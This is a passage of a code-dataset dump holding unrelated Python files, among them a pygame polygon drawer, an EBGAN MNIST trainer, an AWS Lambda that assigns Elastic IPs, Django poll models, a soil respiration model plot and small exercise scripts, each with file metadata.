math.sin(sideAngle)+x0\r\n        y = (bv1x-x0)*math.sin(sideAngle) - (bv1y-y0) * math.cos(sideAngle)+y0\r\n        pts.append([x, y])\r\n    for i in range(n):\r\n        eval(\"draw\"+algo+\"(pts[i], pts[i+1], color)\")\r\n\r\ndef FillPoly(center, n, s, color=[0, 0, 0],algo = \"DDA\"):\r\n    for i in range(1, s):\r\n        DrawPoly(center, n, i, color, algo)\r\n\r\n\r\nsize = [640, 720]\r\nos.environ['SDL_VIDEO_CENTERED'] = '0'\r\n\r\npygame.init()\r\nscreen = pygame.display.set_mode(size)\r\nscreen.fill((255, 255, 255))\r\nDraw()\r\nmainloop()\r\n","sub_path":"Lab5_Pygame/pygamePolygon.py","file_name":"pygamePolygon.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} {"seq_id":"164838851","text":"from Page import Page\nfrom Website import Website\n\n## TESTS FOR THE Page CLASS \nPag1 = Page(url= 'https://wikileaks.org/', folder='News', link='https://wikileaks.org/Amazon-Atlas-Press-Release.html', titulo='WikiLeaks - Amazon Atlas', desc='',formato='html' )\nPag2 = Page(url= 'https://cuevana3.io', folder='Series', link='https://cuevana3.io/serie/chernobyl', titulo='Chernobyl', desc='La serie relata lo que aconteció en 1986, en uno de los mayores desastres provocados por el hombre en la historia reciente, así como los sacrificios realizados para salvar al continente de un desastre sin precedentes.',formato='JSON' )\n\n# TESTS FOR THE Website CLASS\npaginas = [Pag1, Pag2]\nsite = Website('.net','developers.', paginas)\n\n# TESTS FOR THE search FUNCTION \nprint('--------------')\nsite.search(Pag2)\n","sub_path":"Ene-Jun-2020/alvarado-lara-luz-deorela-sabas/PrimerParcial/Ejercicio1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} {"seq_id":"174850734","text":"# -*- coding: utf-8 -*-\nimport json\nimport time\nimport math\nimport tushare as ts\nimport talib\nfrom pandas import DataFrame\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport midas.core.analyzer.api as api\n\nimport midas.core.data.models as models\nfrom midas.core.data.engine import main_session, main_db\nimport midas.bin.env as env\nimport mpl_finance as mpf\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nCOL_PRICE = 'COL_PRICE'\nCOL_LAST_CHG = 'COL_LAST_CHG'\nCOL_LIMIT_COUNT_A = 'COL_LIMIT_COUNT_A'\nCOL_LIMIT_COUNT_B = 'COL_LIMIT_COUNT_B'\nCOL_HISTORY_BREAK_INDEX = 'COL_HISTORY_BREAK_INDEX'\nCOL_PASS_1 = 'COL_PASS_1'\nCOL_PASS_2 = 'COL_PASS_2'\n\nCOL_MA_20_SLOPE = 'COL_MA_20_SLOPE'\nCOL_FLOAT_HOLDERS = 'COL_FLOAT_HOLDERS'\nCOL_HOLDERS_COUNT = 'COL_HOLDERS_COUNT'\nCOL_CIRC_MV = 'COL_CIRC_MV'\n\nsampling_count = 300\n\n\ndef main(offset=0):\n    daily001 = main_session.query(models.DailyPro).filter(models.DailyPro.ts_code == '000001.SZ').order_by(models.DailyPro.trade_date.desc()).limit(30).all()\n    LAST_MARKET_DATE = daily001[offset].trade_date\n\n    outputs = []\n    data_frame = DataFrame()\n    for i, item in enumerate(daily001):\n        daily = main_session.query(models.DailyPro).filter(models.DailyPro.trade_date == item.trade_date)\n        df = pd.read_sql(daily.statement, main_db)\n        chgs = df['pct_chg'].values\n        avg_chg = np.mean(chgs)\n        data_frame.loc[i, 'date'] = item.trade_date\n        data_frame.loc[i, 'avg_chg'] = avg_chg\n\n        print(i)\n\n    data_frame = data_frame.reindex(index=data_frame.index[::-1]).reset_index(drop=True)\n    df = pd.DataFrame(data_frame.loc[:, ['avg_chg']].values, data_frame['date'])\n    fig = plt.figure(figsize=(50, 10))\n    # 
sns.lineplot(data=df, palette=\"tab10\", linewidth=2.5)\n    plt.bar(x=data_frame.index, height=data_frame['avg_chg'].values)\n    plt.savefig('test.png')\n\n\n\ndef get_aggressive_rate(symbol):\n    if symbol.startswith('300'):\n        rate = 19.5\n    elif symbol.startswith('301'):\n        rate = 19.5\n    elif symbol.startswith('688'):\n        rate = 19.5\n    else:\n        rate = 9.5\n\n    return rate\n\n\ndef parse(sequence, rate):\n    dates = []\n    for i in range(len(sequence)):\n        try:\n            if i == 0:\n                continue\n            else:\n                item = sequence[i]\n                if item.pct_chg > rate:\n                    pre_daily = sequence[i + 1: i + 6]\n                    highs = [i.high for i in pre_daily]\n                    max_high = max(highs)\n                    if item.close < max_high:\n                        dates.append(str(item.trade_date))\n        except Exception as e:\n            print(e)\n            continue\n    res = ','.join(dates)\n    return res\n\n\nif __name__ == '__main__':\n    main(offset=0)","sub_path":"core/test/2_average_chg_level.py","file_name":"2_average_chg_level.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} {"seq_id":"77008381","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\n# GetLogger\nimport logging\nimport logging.handlers\n\n\nlogger_name = \"ScreenShotAppTest\"\nlog_path = \"./ScreenShotTest.log\"\nlogger = logging.getLogger(logger_name)\nlogger.setLevel(logging.INFO)\n\nfh = logging.handlers.TimedRotatingFileHandler(log_path, when='M', interval=10, backupCount=10, encoding='utf-8')\nfh.suffix = \"%Y-%m-%d_%H-%M-%S.log\"\nfh.setLevel(logging.INFO)\n\nfmt = \"%(asctime)s %(filename)s[line:%(lineno)d] - %(message)s\"\ndatefmt = \"%a %d %b %Y %H:%M:%S\"\nformatter = logging.Formatter(fmt, datefmt)\n\nfh.setFormatter(formatter)\nlogger.addHandler(fh)\n\n\ndef getSubLogger(subName):\n    subLoggerName = logger_name + '.' + subName\n\n    # the child logger inherits the configuration of the logger above\n    subLogger = logging.getLogger(subLoggerName)\n\n    return subLogger\n\n\nif __name__ == \"__main__\":\n    loggersub = getSubLogger(\"testLogger\")\n    loggersub.info(\"Hello World!\")","sub_path":"ScreenShort/test/GetLoggerTest.py","file_name":"GetLoggerTest.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} {"seq_id":"567015668","text":"import os\nimport sys\n\ndiretorio = sys.argv[1]\npagina = open(\"index.html\", \"w\", encoding=\"utf-8\")\npagina.write(\"\"\"<!DOCTYPE html>\n<html>\n<head>\n    <meta charset=\"utf-8\">\n    <title>Arquivos</title>\n</head>\n<body>\n\"\"\")\nfor arquivo in os.listdir(diretorio):\n    nome, extencao = os.path.splitext(arquivo)\n    if extencao in [\".jpg\", \".png\"]:\n        caminho = os.path.join(diretorio, arquivo)\n        pagina.write(f\"<p><a href='{caminho}'><img src='{caminho}'> {nome}</a></p>
\")\npagina.write(\"\")\npagina.close()\n","sub_path":"cap09/exercicio-09-33.py","file_name":"exercicio-09-33.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"151551106","text":"## \n# This module implements a function for executing binary searches in a list.\n#\n\n## Finds a value in a range of a sorted list, using the binary search algorithm.\n# @param values the list in which to search\n# @param low the low index of the range\n# @param high the high index of the range\n# @param target the value to find\n# @return the index at which the target occurs, or -1 if it does not occur in the list\n#\ndef binarySearch(values, low, high, target) :\n if low <= high :\n mid = (low + high) // 2\n \n if values[mid] == target :\n return mid\n elif values[mid] < target :\n return binarySearch(values, mid + 1, high, target)\n else :\n return binarySearch(values, low, mid - 1, target)\n \n else :\n return -1\n","sub_path":"P4EO_source/ch12/sec06/binarysearch.py","file_name":"binarysearch.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"525160825","text":"# coding: UTF-8\nfrom __future__ import print_function\nimport argparse\nimport os\nimport datetime\nimport shutil\nimport glob\nimport re\n\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\nfrom chainer.dataset import convert\nfrom chainer.dataset import iterator as iterator_module\nfrom chainer import training\nfrom chainer import reporter\nfrom chainer import cuda\nfrom chainer.training import extensions\nimport six\n\nimport numpy as np\nfrom PIL import Image\nimport matplotlib as mpl\nmpl.use('Agg')\nfrom matplotlib import pylab as plt\n\n\n# Network definition\nclass discriminator(chainer.Chain):\n\n def __init__(self, n_units, n_canvas):\n super(discriminator, self).__init__(\n fc1=L.Linear(n_canvas ** 2, n_units, wscale=0.002, bias=0),\n bn1=L.BatchNormalization(n_units),\n fc2=L.Linear(n_units, n_units, wscale=0.002, bias=0),\n bn2=L.BatchNormalization(n_units),\n fc3=L.Linear(n_units, n_units, wscale=0.002, bias=0),\n bn3=L.BatchNormalization(n_units),\n fc4=L.Linear(n_units, n_units, wscale=0.002, bias=0),\n bn4=L.BatchNormalization(n_units),\n fc5=L.Linear(n_units, n_canvas ** 2, wscale=0.002, bias=0),\n )\n self.n_canvas = n_canvas\n self.n_saved = 1\n\n def __call__(self, x, train=True):\n h1 = F.leaky_relu(F.dropout(self.bn1(self.fc1(x)), train=train))\n h2 = F.leaky_relu(F.dropout(self.bn2(self.fc2(h1)), train=train))\n h3 = F.leaky_relu(F.dropout(self.bn3(self.fc3(h2)), train=train))\n h4 = F.leaky_relu(F.dropout(self.bn4(self.fc4(h3)), train=train))\n y = self.fc5(h4)\n if train:\n return y\n else:\n return cuda.to_cpu(y.data)\n\n def encode(self, x):\n h1 = F.leaky_relu(F.dropout(self.bn1(self.fc1(x)), train=False))\n h2 = F.leaky_relu(F.dropout(self.bn2(self.fc2(h1)), train=False))\n h3 = F.leaky_relu(F.dropout(self.bn3(self.fc3(h2)), train=False))\n h4 = F.leaky_relu(F.dropout(self.bn4(self.fc4(h3)), train=False))\n return h4\n\n def save_images(self, n_image, result, test):\n pic = np.zeros((n_image * self.n_canvas, n_image * self.n_canvas))\n test = chainer.Variable(test)\n images = np.squeeze(self.__call__(test, train=False))\n images = images.reshape((-1, self.n_canvas, self.n_canvas))\n for i in six.moves.range(n_image):\n for j in six.moves.range(n_image):\n pic[self.n_canvas * i:self.n_canvas * i + 
self.n_canvas,\n self.n_canvas * j:self.n_canvas * j + self.n_canvas] = \\\n images[i * n_image + j]\n plt.imshow(pic, vmin=-1, vmax=1, interpolation='none')\n plt.gray()\n plt.savefig('{}/encode_decode_{}.png'.format(result, self.n_saved))\n self.n_saved += 1\n\n\nclass generator(chainer.Chain):\n\n def __init__(self, n_z, n_units, n_canvas, batchsize, xp):\n super(generator, self).__init__(\n fc1=L.Linear(n_z, n_units, wscale=0.02, bias=0),\n bn1=L.BatchNormalization(n_units),\n fc2=L.Linear(n_units, n_units, wscale=0.02, bias=0),\n bn2=L.BatchNormalization(n_units),\n fc3=L.Linear(n_units, n_units, wscale=0.02, bias=0),\n bn3=L.BatchNormalization(n_units),\n fc4=L.Linear(n_units, n_units, wscale=0.02, bias=0),\n bn4=L.BatchNormalization(n_units),\n fc5=L.Linear(n_units, n_canvas ** 2, wscale=0.02, bias=0),\n )\n self.n_canvas = n_canvas\n self.batchsize = batchsize\n self.n_z = n_z\n self._xp = xp\n self.n_saved = 1\n\n def __call__(self, train=True, n_image=None):\n if train:\n z = chainer.Variable(self._xp.random.uniform(\n -1, 1, (self.batchsize, self.n_z)).astype(np.float32))\n else:\n z = chainer.Variable(self._xp.random.uniform(\n -1, 1, (n_image * n_image, self.n_z)).astype(np.float32))\n h1 = F.relu(self.bn1(self.fc1(z)))\n h2 = F.relu(self.bn2(self.fc2(h1)))\n h3 = F.relu(self.bn3(self.fc3(h2)))\n h4 = F.relu(self.bn4(self.fc4(h3)))\n y = self.fc5(h4)\n if train:\n return y\n else:\n return cuda.to_cpu(y.data)\n\n def save_images(self, n_image, result):\n pic = np.zeros((n_image * self.n_canvas, n_image * self.n_canvas))\n images = np.squeeze(self.__call__(False, n_image))\n images = images.reshape((-1, self.n_canvas, self.n_canvas))\n for i in six.moves.range(n_image):\n for j in six.moves.range(n_image):\n pic[self.n_canvas * i:self.n_canvas * i + self.n_canvas,\n self.n_canvas * j:self.n_canvas * j + self.n_canvas] = \\\n images[i * n_image + j]\n plt.imshow(pic, vmin=-1, vmax=1, interpolation='none')\n plt.gray()\n plt.savefig('{}/generated_{}.png'.format(result, self.n_saved))\n self.n_saved += 1\n\n\nclass gan_updater(training.StandardUpdater):\n\n def __init__(self, iterator, discriminator, generator,\n optimizer_d, optimizer_g, margin, pt,\n device, batchsize,\n converter=convert.concat_examples):\n if isinstance(iterator, iterator_module.Iterator):\n iterator = {'main': iterator}\n self._iterators = iterator\n self.discriminator = discriminator\n self.generator = generator\n self._optimizers = {'discriminator': optimizer_d,\n 'generator': optimizer_g}\n self.device = device\n self.loss_weight = batchsize / len(self._iterators['main'].dataset)\n self.converter = converter\n self.iteration = 0\n self.margin = margin\n self.pt = pt\n self.sum_loss_dis = 0\n self.sum_loss_gen = 0\n self.sum_pt = 0\n\n def update_core(self):\n if self._iterators['main'].is_new_epoch:\n self.sum_loss_dis = 0\n self.sum_loss_gen = 0\n self.sum_pt = 0\n\n batch = self._iterators['main'].next()\n in_arrays = self.converter(batch, self.device)\n\n in_var = chainer.Variable(in_arrays)\n generated = self.generator()\n\n y_data = self.discriminator(in_var)\n loss_dis = F.mean_squared_error(y_data, in_var)\n\n y_generated = self.discriminator(generated)\n loss_gen = F.mean_squared_error(y_generated, generated)\n loss_dis += F.relu(self.margin - loss_gen)\n\n self.sum_loss_dis += self.loss_weight * loss_dis.data\n self.sum_loss_gen += self.loss_weight * loss_gen.data\n\n if self.pt:\n s = self.discriminator.encode(generated)\n normalized_s = F.normalize(s)\n cosine_similarity = F.matmul(normalized_s, 
normalized_s,\n transb=True)\n pterm = cosine_similarity * cosine_similarity\n pterm = F.sum(pterm)\n pterm /= s.shape[0] * s.shape[0]\n loss_gen += 0.1 * pterm\n self.sum_pt += self.loss_weight * pterm.data\n\n reporter.report({'dis/loss': self.sum_loss_dis})\n reporter.report({'gen/loss': self.sum_loss_gen})\n reporter.report({'gen/pt': self.sum_pt})\n\n self._optimizers['discriminator'].target.cleargrads()\n loss_dis.backward()\n self._optimizers['discriminator'].update()\n\n self._optimizers['generator'].target.cleargrads()\n loss_gen.backward()\n self._optimizers['generator'].update()\n\n\ndef main():\n parser = argparse.ArgumentParser(description='DCGAN')\n parser.add_argument('--batchsize', '-b', type=int, default=100,\n help='Number of images in each mini-batch')\n parser.add_argument('--epoch', '-e', type=int, default=500,\n help='Number of sweeps over the dataset to train')\n parser.add_argument('--gpu', '-g', type=int, default=-1,\n help='GPU ID (negative value indicates CPU)')\n parser.add_argument('--resume', '-r', default='',\n help='Resume the training from snapshot')\n parser.add_argument('--unitd', '-ud', type=int, default=1024,\n help='Number of units of discriminator')\n parser.add_argument('--unitg', '-ug', type=int, default=3200,\n help='Number of units of generator')\n parser.add_argument('--canvas', '-c', type=int, default=28,\n help='Size of canvas')\n parser.add_argument('--dimension', '-d', type=int, default=3,\n help='Dimension of rand')\n parser.add_argument('--image', '-i', type=int, default=5,\n help='Number of output images')\n parser.add_argument('--margin', '-m', type=int, default=10,\n help='Margin of loss function')\n parser.add_argument('--pt', '-p', type=int, default=1,\n help='Use of pull-away term')\n args = parser.parse_args()\n xp = cuda.cupy if args.gpu >= 0 else np\n\n result = datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S')\n os.mkdir(result)\n shutil.copy(__file__, result + '/' + __file__)\n\n print('GPU: {}'.format(args.gpu))\n print('# Minibatch-size: {}'.format(args.batchsize))\n print('# epoch: {}'.format(args.epoch))\n print('')\n\n # Set up a neural network to train\n dis = discriminator(args.unitd, args.canvas)\n gen = generator(args.dimension, args.unitg, args.canvas,\n args.batchsize, xp)\n if args.gpu >= 0:\n chainer.cuda.get_device(args.gpu).use() # Make a specified GPU current\n dis.to_gpu() # Copy the model to the GPU\n gen.to_gpu() # Copy the model to the GPU\n\n # Setup optimizers\n optimizers = {'dis': chainer.optimizers.Adam(alpha=1e-3, beta1=0.5),\n 'gen': chainer.optimizers.Adam(alpha=1e-3, beta1=0.5)}\n optimizers['dis'].setup(dis)\n optimizers['gen'].setup(gen)\n\n # Load the MNIST dataset\n train, test = chainer.datasets.get_mnist(False, 1)\n train *= 2\n train -= 1\n test *= 2\n test -= 1\n test = xp.asarray(test[:args.image * args.image])\n data_iter = chainer.iterators.SerialIterator(train, args.batchsize)\n\n updater = gan_updater(data_iter, dis, gen,\n optimizers['dis'], optimizers['gen'], args.margin,\n args.pt, args.gpu, args.batchsize)\n trainer = training.Trainer(updater, (args.epoch, 'epoch'), out=result)\n\n # trainer.extend(extensions.dump_graph('dis/loss'))\n # trainer.extend(extensions.dump_graph('gen/loss'))\n # trainer.extend(extensions.dump_graph('gen/pt'))\n\n # Take a snapshot at each epoch\n trainer.extend(extensions.snapshot(), trigger=(args.epoch, 'epoch'))\n\n # Write a log of evaluation statistics for each epoch\n trainer.extend(extensions.LogReport())\n\n 
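# The keys printed below must match those passed to reporter.report() in gan_updater.update_core() above ('dis/loss', 'gen/loss', 'gen/pt').\n    # A hedged aside: depending on the Chainer version, extensions.PlotReport can chart the same keys, e.g.:\n    # trainer.extend(extensions.PlotReport(['dis/loss', 'gen/loss'], 'epoch', file_name='loss.png'))\n    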
trainer.extend(extensions.PrintReport(\n ['epoch', 'dis/loss', 'gen/loss', 'gen/pt']))\n\n @training.make_extension(trigger=(1, 'epoch'))\n def generate_images(trainer):\n gen.save_images(args.image, result)\n\n @training.make_extension(trigger=(1, 'epoch'))\n def encode_decode_images(trainer):\n dis.save_images(args.image, result, test)\n\n trainer.extend(generate_images)\n trainer.extend(encode_decode_images)\n # Print a progress bar to stdout\n trainer.extend(extensions.ProgressBar())\n\n if args.resume:\n # Resume from a snapshot\n chainer.serializers.load_npz(args.resume, trainer)\n\n # Run the training\n trainer.run()\n\nif __name__ == '__main__':\n main()\n","sub_path":"ebgan_mnist.py","file_name":"ebgan_mnist.py","file_ext":"py","file_size_in_byte":11598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"651275669","text":"import re\nimport os\n\n\ndef checkpath(path):\n if not os.path.isdir(path):\n return False\n else:\n return True\n\n\ndef checkfilename(files):\n filenames = files.split(\",\")\n errors = []\n pattern_full = r\"\\w*\\.\\w\\w\\w\"\n pattern_after_dot = re.compile(\"\\.\\w\\w\\w$\")\n pattern_before_dot = re.compile('^\\w*')\n for file in filenames:\n if re.match(pattern_full, file) is None:\n errors.append(file)\n if len(errors) != 0:\n #print(\"You have {} mistakes in your filenames: \".format(len(errors)))\n #print(\",\".join(\"{}\".format(error) for error in errors))\n return errors\n else:\n return \"0\"","sub_path":"checks.py","file_name":"checks.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"542535674","text":"import attr\n\n\n@attr.s\nclass SourceFile:\n name: str = attr.ib()\n text: str = attr.ib(repr=False)\n\n @classmethod\n def load(cls, name: str):\n with open(name) as fp:\n text = fp.read()\n return cls(\n name=name,\n text=text,\n )\n\n\n@attr.s\nclass Location:\n source: SourceFile = attr.ib()\n pos: int = attr.ib()\n\n\nclass LocationError(RuntimeError):\n def __init__(self, loc: Location, message: str) -> None:\n self.loc = loc\n self.message = message\n super().__init__(loc, message)\n\n\ndef error_at(loc: Location, message: str) -> str:\n try:\n start = loc.source.text.rindex(\"\\n\", 0, loc.pos) + 1\n except ValueError:\n start = 0\n try:\n end = loc.source.text.index(\"\\n\", loc.pos)\n except ValueError:\n end = len(loc.source.text)\n\n print(loc, start, end, loc.pos - start)\n line = loc.source.text[start:end]\n s = line + \"\\n\"\n s += \" \" * (loc.pos - start)\n s += \"^ \" + message\n return s\n","sub_path":"pycc/loc.py","file_name":"loc.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"488712823","text":"import boto3\n\nclass Assign2EIP:\n def __init__(self, instance):\n self.instance_id = instance\n self.ec2 = boto3.client('ec2')\n self.ec2R = boto3.resource('ec2')\n self.ssm = boto3.client('ssm')\n self.eni, self.attachment_id = self.get_eni()\n self.assign_private_ip()\n self.eip_dict = self.generate_2_eip()\n self.private_ips = self.fetch_private_ips()\n self.associate_eip_private_ip()\n\n def get_eni(self):\n eni = self.ec2R.Instance(self.instance_id)\n return (eni.network_interfaces_attribute[0]['NetworkInterfaceId'],eni.network_interfaces_attribute[0]['Attachment']['AttachmentId'])\n\n\n def assign_private_ip(self):\n result = 
self.ec2.assign_private_ip_addresses(NetworkInterfaceId=self.eni, SecondaryPrivateIpAddressCount=1)\n        return result['AssignedPrivateIpAddresses'][0]['PrivateIpAddress']\n\n    def generate_2_eip(self):\n        data = self.ec2.describe_addresses()\n        counter = []\n        eip_dictionary = {}\n        \n        if len(data['Addresses']) == 0:\n            for execute in range(2):\n                data = self.ec2.allocate_address(Domain='vpc')\n                public_ip = data['PublicIp']\n                allocation_id = data['AllocationId']\n                eip_dictionary[public_ip] = allocation_id\n            return eip_dictionary\n\n        if len(data['Addresses']) < 2:\n            for i in data['Addresses']:\n                if 'InstanceId' not in i.keys():\n                    counter.append(i)\n            if len(counter) < 2:\n                for execute in range(1):\n                    data = self.ec2.allocate_address(Domain='vpc')\n                updated_data = self.ec2.describe_addresses()['Addresses']\n                return {eip['PublicIp']: eip['AllocationId'] for eip in updated_data}\n\n\n        else:\n            data = self.ec2.describe_addresses()['Addresses']\n            return {eip['PublicIp']:eip['AllocationId'] for eip in data}\n\n    def associate_eip_private_ip(self):\n        allocation_ids = [ai for ai in self.eip_dict.values()]\n        for index, pip in enumerate(self.private_ips):\n            print(allocation_ids[index], pip)\n            self.ec2.associate_address(\n                AllocationId=allocation_ids[index],\n                InstanceId=self.instance_id,\n                PrivateIpAddress=pip)\n\n\n    def fetch_private_ips(self):\n        data = self.ec2.describe_network_interfaces(NetworkInterfaceIds=[self.eni])\n        return [pip['PrivateIpAddress'] for pip in data['NetworkInterfaces'][0]['PrivateIpAddresses']]\n\n\ndef lambda_handler(event,context):\n    instance_id = event['detail']['instance-id']\n    go = Assign2EIP(instance_id)\n","sub_path":"assign_2_eip_eni.py","file_name":"assign_2_eip_eni.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"597309306","text":"from django.db import models\nimport json\n\n# Create your models here.\nclass Question(models.Model):\n\t# Text field with a maximum length of 200\n\tquestion_text = models.CharField(max_length=200)\n\t# Date and time field\n\tpub_date = models.DateTimeField('date published')\n\t# Icon\n\ticon = models.CharField(max_length = 50)\n\n\tdef __str__(self):\n\t\treturn self.question_text.encode(\"utf-8\")\n\n\tdef toDict(self):\n\t\tvotesList = []\n\n\t\tfor c in self.choice_set.all():\n\t\t\tvotesList.append({\n\t\t\t\t\"id\": c.pk,\n\t\t\t\t\"name\": c.choice_text.encode(\"utf-8\"),\n\t\t\t\t\"votes\": c.votes\n\t\t\t})\n\n\t\treturn {\n\t\t\t'id': self.id,\n\t\t\t\"name\": self.question_text.encode(\"utf-8\"),\n\t\t\t\"icon\": self.icon,\n\t\t\t\"pub_date\": self.pub_date.strftime(\"%Y-%m-%d %H:%M:%S\"),\n\t\t\t\"options\": votesList\n\t\t}\n\n\tdef toJSON(self):\n\t\treturn json.dumps(self.toDict())\n\nclass Choice(models.Model):\n\t# This field is a foreign key to Question\n\tquestion = models.ForeignKey(Question)\n\tchoice_text = models.CharField(max_length=200)\n\tvotes = models.IntegerField(default=0)\n\n\tdef __str__(self):\n\t\treturn self.choice_text.encode(\"utf-8\") + \"\\t{\" + str(self.votes) + \"}\"","sub_path":"mysite/polls/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"451945493","text":"#\n# @lc app=leetcode id=7 lang=python3\n#\n# [7] Reverse Integer\n#\n\n# @lc code=start\nclass Solution:\n    def reverse(self, x: int) -> int:\n        res, ispos = 0, 1\n        if(x < 0):\n            ispos = -1\n            x *= -1\n        while(x!=0):\n            res = res * 
10 + x%10\n if(res > 2147483647):\n return 0\n x = int(x / 10)\n return res*ispos\n# @lc code=end\n\n","sub_path":"heregreat/python/7.reverse-integer.py","file_name":"7.reverse-integer.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"365806150","text":"import csv\nfrom DAMM_model import damm_flx\nfrom supeca import supmic_flx\nfrom su_model import su_flx\nimport numpy as np\n\nk2f=10. #number of C atmos per substrate molecule\n#set up model parameters\nDZ=0.1 #topsoil thickness, 10 cm\nalphaV=80.0 #volume a cell occupies\nmb=2. #mol of microbial C\nNcello=10.0 #number of cells per microsite, this is for oxygen\nfrom Kaffapp import set_micpara\nset_micpara(1.e2)\n\nfrom Kaffapp import rc, calc_Kaff_soil, calc_Kaff_O2, calc_cell_permolC, calc_Kaff_SC,calc_Kaff_ch4\nfrom supeca import supeca_model\n#number of cells per mol carbon\ncell_molC=calc_cell_permolC(rc)\nBT=mb*cell_molC #total number of cells, in mol /m3\n\nO2=8.57 # mol /m3\nS=0.3 #mol/m3 ~ 3.6 mg/L\n\nk=0\ndammfls=[]\nsufls=[]\nsupfls=[]\ndf=3.\n\no2scal=1.\npct_sand=20.\npct_clay=[10.,20.,40.,70.]\nkt=len(pct_clay)\nk=0\n\nwhile k < kt:\n s_sat, theta, epsi, taug, tauw, film,psi,chb=calc_Kaff_soil(pct_clay[k], pct_sand)\n factw=s_sat**(1./df)\n Kaff_o2g_full,Kaff_o2g,k2,k1_o2,k1_o2_full,kappa_tops=calc_Kaff_O2(s_sat, theta, epsi, taug, tauw, film, DZ, Ncello, BT, alphaV,factw)\n Kaff_o2g_full=Kaff_o2g_full*o2scal\n k1_o2_full=k1_o2_full/o2scal\n\n Ncell=10\n k1_s,Kaff_s,Kaff_s_0=calc_Kaff_SC(s_sat, theta, epsi, taug, tauw, film, DZ, Ncell, alphaV)\n #damm model\n k2=k2*k2f\n Vmax=BT*k2\n dammf=damm_flx(O2,S,factw,Kaff_s*1.e0,Kaff_o2g,kappa_tops,Vmax)\n damfmax=np.max(dammf)\n dammf=dammf/damfmax\n #su model\n suf=su_flx(O2,S, factw,BT, k2*1.e0, k1_o2, k1_s,kappa_tops)\n sufmax=np.max(suf)\n suf=suf/sufmax\n #supeca model\n ms=0.0\n Km_s=2.0\n supf=supmic_flx(O2,S,factw, BT, ms, Km_s, Kaff_o2g, Kaff_s, kappa_tops, k2)\n supfmax=np.max(supf)\n supf=supf/supfmax\n dammfls.append(dammf)\n sufls.append(suf)\n supfls.append(supf)\n k=k+1\n\nplt_to_file=True\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\n\nif plt_to_file:\n pdf=PdfPages('figure/Figure6.pdf')\n fig=plt.figure()\nfont = {'family': 'serif',\n 'color': 'black',\n 'weight': 'normal',\n 'size': 12,\n }\n\n#plt.rcParams[\"figure.figsize\"] = (11,4)\nplt.subplot(221)\nplt.plot(s_sat,np.transpose(dammfls))\nplt.yticks(np.arange(0, 1.2, step=0.25),[0.0,'',0.5,'',1.0])\nplt.text(0.05, 0.9, '(a) DM',fontdict=font)\nplt.xticks(np.arange(0, 1.2, step=0.2),[])\nplt.subplot(222)\nplt.plot(s_sat,np.transpose(sufls))\nplt.yticks(np.arange(0, 1.2, step=0.25),[])\nplt.text(0.05, 0.9, '(b) SU',fontdict=font)\nplt.xlabel('Relative saturation',fontdict=font)\nplt.subplot(223)\nfor n in range(4):\n plt.plot(s_sat,np.transpose(supfls[n][:]),label=\"clay=%d%s\"%(pct_clay[n],'%',))\nplt.yticks(np.arange(0, 1.2, step=0.25),[])\nplt.yticks(np.arange(0, 1.2, step=0.25),[0.0,'',0.5,'',1.0])\nplt.text(0.05, 0.9, '(c) SUPECA',fontdict=font)\nplt.xlabel('Relative saturation',fontdict=font)\nplt.legend(loc=9, bbox_to_anchor=(1.7, 0.6))\nplt.subplots_adjust(top=0.9, bottom=0.12, left=0.10, right=0.95, hspace=0.1,\n wspace=0.15)\nplt.text(0.15, 0.915, 'Clay content effect on moisture-respiration relationship',fontdict=font,transform=plt.gcf().transFigure)\n\nplt.text(0.015, 0.75, 'Normalized respiration',fontdict=font,transform=plt.gcf().transFigure, 
rotation=90)\nif plt_to_file:\n    pdf.savefig(fig)\n    pdf.close()\nelse:\n    plt.show()\n","sub_path":"clay_hr_sens_moisture.py","file_name":"clay_hr_sens_moisture.py","file_ext":"py","file_size_in_byte":3328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"519316747","text":"import logging\nimport time\n\nfrom crawlers.twitter.tw import Tw\nfrom crawlers.vkontakte.vk import Vk\nfrom crawlers.instagram.insta import Insta\nfrom monitor_api.api import MonitorApi\nfrom utils.json_helper import read_json_from_file, write_json_to_file, dump\n\nconfig = read_json_from_file('resources/config.json')\nlogging.basicConfig(level='INFO')\n\n\ndef get_crawler(type_social):\n    if type_social == 'IN':\n        return insta\n    if type_social == 'VK':\n        return vk\n    if type_social == 'TW':\n        return tw\n\n\ndef update_sources():\n    sources = monitor.get_sources()\n    write_json_to_file('sources_from_monitor.json', dump(sources))\n\n    count = 0\n    for source in sources:\n        count += 1\n\n        internal_id = source['internal_id']\n        source_id = source['id']\n        link = source['link']\n        name = source['name']\n        avatar = 